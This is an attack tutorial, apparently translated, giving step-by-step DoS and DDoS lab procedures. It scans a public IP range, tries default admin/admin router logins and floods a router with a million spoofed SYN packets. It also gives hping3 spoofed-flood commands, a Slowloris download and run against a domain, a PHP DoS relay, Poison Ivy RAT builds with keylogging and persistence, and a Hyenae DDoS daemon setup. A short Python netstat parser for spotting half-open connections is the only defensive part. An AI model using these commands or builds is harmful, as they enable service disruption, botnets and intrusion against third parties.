2. SYN flood attack
In this section we try a SYN flood against an ADSL router. First we find out how many ADSL routers currently have port 80 open, using Nmap. Suppose our current public IP is 118.68.226.103; we scan with
nmap -sS -p 80 118.68.226.0/24 -oN scan_adsl.txt
(saving the output to scan_adsl.txt, which the next step reads).
For example, the following section of the file scan_adsl.txt means that IP 118.68.226.7 has port 80 open:
Nmap scan report for adsl-dynamic-pool-xxx.hcm.fpt.vn (118.68.226.7)
Host is up (0.037s latency).
PORT STATE SERVICE
80/tcp open http
We open this IP in a web browser and try the default username admin and password admin.
We then SYN flood port 80 on this ADSL router with the tool syn-flood-alpha1.tar.gz, installing it as shown below.
root@bt:~/Desktop# ls
scan_adsl.txt syn-flood-alpha1.tar.gz
root@bt:~/Desktop# tar -xvf syn-flood-alpha1.tar.gz
syn-flood/
syn-flood/Makefile
syn-flood/gpl.txt
syn-flood/syn-flood.cpp
root@bt:~/Desktop# cd syn-flood
root@bt:~/Desktop/syn-flood# ls
gpl.txt Makefile syn-flood.cpp
root@bt:~/Desktop/syn-flood# make
g++ -O2 -g -Wall -fmessage-length=0 -c -o syn-flood.o syn-flood.cpp
g++ -o syn-flood syn-flood.o

We run the attack with the command below, sending 1,000,000 SYN packets:
root@bt:~/Desktop/syn-flood# ./syn-flood
Usage: ./syn-flood --ip IP --port PORT [verbose]
-h --help Display this usage information.
-i --ip Destination IP address.
-p --port Destination port.
-n --num Number of packets to send.
-v --verbose Print verbose messages.
root@bt:~/Desktop/syn-flood# ./syn-flood -i 118.68.226.7 -p 80 -n 1000000
Sent 1000000 packets.

Analysing the tool's behaviour with Wireshark, we see that it sends 1,000,000 TCP SYN packets to the victim, the ADSL router at 118.68.226.7, each with a different forged source IP address.
3. Using hping3 for a SYN flood attack
The victim is 192.168.1.101/24 (Windows XP) and the attacker is 192.168.1.100/24 (BackTrack 5). First we scan the victim's open ports with Nmap:
root@bt:~# nmap -sS 192.168.1.101
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:9F:87:19 (VMware)
We use hping3 to SYN flood the open port 445:
root@bt:~# man hping3 => check the hping3 options
root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 => SYN flood the victim at 192.168.1.101
-a spoof the source address as 192.168.1.254
-p destination port 445
-S set the SYN flag
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets per second)
--faster alias for -i u1000 (100 packets per second)
--flood send packets as fast as possible. Don't show replies.
root@bt:~# hping3 -a 192.168.1.254 -p 445 192.168.1.101 -S -i u100 -c 100000
-c 100000 is the count: 100,000 packets are sent to the victim.
On the victim, while it is being SYN flooded, checking the connection table with netstat -ano shows a large number of connections in the SYN_RECEIVED state.
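The netstat check at the end of this step can be automated. The following added example (not code from the report) parses the Windows netstat -ano format, counts SYN_RECEIVED sockets per remote host and per local port, and flags any remote host above a threshold. The sample output is constructed to look like the lab above (a single spoofed source, 192.168.1.254, flooding port 445 of 192.168.1.101); it is not a capture from the report. When the flood uses random spoofed sources, as the syn-flood tool in step 2 does, the per-host count is spread thin and the per-local-port total is the figure to watch.

```python
"""Count half-open (SYN_RECEIVED) sockets in Windows `netstat -ano` output.
Added example, not from the original report. SAMPLE_NETSTAT is constructed."""
import re
from collections import Counter

# Windows netstat rows: Proto  Local Address  Foreign Address  State  PID
# (UDP rows have no State column, so the 4th field is the PID for them.)
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(\S+)(?:\s+(\d+))?\s*$")

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       920
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.1.101:445      192.168.1.254:1025     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1026     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1027     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1028     SYN_RECEIVED    4
  TCP    192.168.1.101:445      192.168.1.254:1029     SYN_RECEIVED    4
  TCP    192.168.1.101:139      192.168.1.50:49152     ESTABLISHED     4
  UDP    0.0.0.0:500            *:*                                    600
"""


def parse_netstat(text):
    """Return the TCP rows as dicts; header lines and UDP rows are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        if proto == "UDP":
            continue
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "state": state, "pid": pid})
    return rows


def split_host_port(addr):
    # rpartition copes with IPv6 forms such as [::1]:445 as well as 1.2.3.4:445
    host, _, port = addr.rpartition(":")
    return host, port


def half_open_report(text, threshold=3):
    """Summarise SYN_RECEIVED sockets: per remote host, per local port, and the
    remote hosts with more than `threshold` half-open entries."""
    by_remote = Counter()
    by_local_port = Counter()
    ports_hit = {}
    for row in parse_netstat(text):
        if row["state"] != "SYN_RECEIVED":
            continue
        rhost, _ = split_host_port(row["foreign"])
        _, lport = split_host_port(row["local"])
        by_remote[rhost] += 1
        by_local_port[lport] += 1
        ports_hit.setdefault(rhost, set()).add(lport)
    suspects = {h: {"half_open": n, "local_ports": sorted(ports_hit[h])}
                for h, n in by_remote.items() if n > threshold}
    return {"by_remote": by_remote, "by_local_port": by_local_port,
            "suspects": suspects}


if __name__ == "__main__":
    report = half_open_report(SAMPLE_NETSTAT)
    for host, info in report["suspects"].items():
        print(f"{host}: {info['half_open']} half-open -> local ports {info['local_ports']}")
    print("half-open per local port:", dict(report["by_local_port"]))
```

The threshold of three is arbitrary; on a busy server a handful of SYN_RECEIVED entries per peer is normal, so the value should be tuned against a baseline taken when the service is healthy.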
4. PHP DoS
- We upload a PHP DoS script to a web server and use that server to attack another server.
- First we upload the PHP DoS source onto the web server.
We then open the PHP DoS page in a web browser and launch the attack against a victim.
5. Apache DoS with Slowloris
Slowloris affects Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer and others; the Windows web servers IIS 6.0 and IIS 7.0 are not affected by this tool.
Download the source code from http://ha.ckers.org/slowloris/slowloris.pl and save it as slowloris.pl, then make it executable (chmod +x slowloris.pl).
Run the DoS against a victim with
perl ./slowloris.pl -dns www.abc.com -timeout 2000 -num 500 -tcpto 5
See the program's help output for the meaning of each option.
6. Using Poison Ivy to build a botnet
First we need to create a Remote Access Trojan file and send it to the victim. Once it is installed, the victim's machine becomes a zombie controlled by the attacker.
Decompress the program and run the Poison Ivy executable.
We enter the parameters:
o The IP of the machine acting as the server the zombies connect back to, and the matching port. By default the program uses port 3460. Several profiles can be created, each bound to one port on the attacker's machine.
o The ID, for example server_test.
o The login password, which can be a static password or a dynamic key.
o Click Next at the bottom right of the screen.
The program moves on to the Install section. We enter:
o HKLM/Run Name
o ActiveX Key Name
o Copy File: a file name ending in .exe or .scr
o Optionally, Copy to Alternate Data Stream to hide the file.
Click Next to move to the Advanced section, where features such as Key logger and the PE format can be selected.
Click Next to move to the Build section, where the zombie file's icon can be changed; click Generate and choose where to save the zombie file and what to call it.
On the attacker's machine we use the New Client feature to manage the connections from the zombies, selecting the name of the Profile created earlier.
The program asks us to enter the PASSWORD or to LOAD KEY, depending on the password method configured above.
After the client has run dos_server.exe, checking the connections shows that one connection has appeared.
Double-clicking the row representing the client shows all the actions the attacker can perform on the zombie (depending on the initial configuration).
7. DoS and DDoS with the Hyenae tool
- Download the program from http://sourceforge.net/projects/hyenae/files/. It can perform both DoS and DDoS attacks. For DDoS we install the Hyenae daemon on one machine and control it with Hyenae Front End (graphical) or hyenae (command line).
- In this lab we install the Hyenae daemon on Windows Server 2003 (192.168.1.100/24) and use Windows XP (192.168.1.101/24) as the controlling client.
First we configure hyenaed. To list the network cards the program recognises:
C:\> hyenaed.exe -l
Suppose the program lists the Intel Pro/1000 MT card as number 1. Start hyenaed.exe listening on the Server 2003 machine:
C:\> hyenaed.exe -I 1 -a 192.168.1.100 -p 8888 -u 10000 -k 123abc!!!
-I: the interface to use
-a: the IP address to bind to
-p: the port to listen on
-u: the number of packets sent per connection
-k: the key the front end must present when it connects (see hyenaed.exe -h for the exact wording)
We then connect with hyenae.exe as the front end.